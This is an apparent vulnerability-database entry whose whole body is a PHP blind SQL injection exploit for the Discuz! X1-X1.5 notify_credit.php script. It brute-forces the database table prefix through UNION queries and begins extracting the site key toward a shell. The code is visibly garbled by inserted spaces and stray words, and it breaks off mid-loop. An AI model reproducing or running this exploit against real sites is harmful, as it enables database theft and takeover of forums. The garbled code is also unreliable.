Discuz X1-X1.5 Blind SQL injection Getshell Xday-vulnerability warning-the black bar safety net

2011-06-03T00:00:00
ID MYHACK58:62201130698
Type myhack58
Reporter 佚名
Modified 2011-06-03T00:00:00

Description

<? php

print_r('

+---------------------------------------------------------------------------+

Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05

mail: toby57 at 1 6 3 dot com

team: http://www.wolvez.org

+---------------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' url [pre]

Example:

php '.$ argv[0].' http://localhost/

php '.$ argv[0].' http://localhost/ xss_

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$url = $argv[1];

$pre = $argv[2]?$ argv[2]:'pre_';

$target = parse_url($url);

extract($target);

$path1 = $path . '/api/trade/notify_credit.php';

$hash = array();

$hash = the array_merge($hash, range(4 8, 5 7));

$hash = the array_merge($hash, range(9 7, 1 0 2));

$tmp_expstr = "'";

$res = send();

if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops. I can NOT hack it.');}

preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);

if($match[1])$pre = $match[1];

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE "='";

$res = send();

if(strpos($res,"doesn't exist")!== false){

echo "Table_pre is WRONG!\ nReady to Crack It. Please Waiting..\n";

for($i = 1;$i<2 0;$i++){

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',"))=$i AND "='";

$res = send();

if(strpos($res,'SQL syntax')!== false){

$pre = ";

$hash2 = array();

$hash2 = array_merge($hash2, range(4 8, 5 7));

$hash2 = array_merge($hash2, range(9 7, 1 2 2));

$hash2[] = 9 5;

for($j = 1;$j <= $i; $j++){

for ($k = 0; $k <= 2 5 5; $k++) {

if(in_array($k, $hash2)) {

$char = dechex($k);

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',"),$j,1)=0x{$char} AND "='";

$res = send();

if(strpos($res,'SQL syntax')!== false){

echo chr($k);

$pre .= chr($k);break;

}

}

}

}

if(strlen($pre)){echo "\nCracked...Table_Pre:".$ pre."\ n";break;}else{die('GET Table_pre Failed..');};

} } };

echo "Please Waiting....\ n";

$sitekey = ";

for($i = 1;$i <= 3 2; $i++){
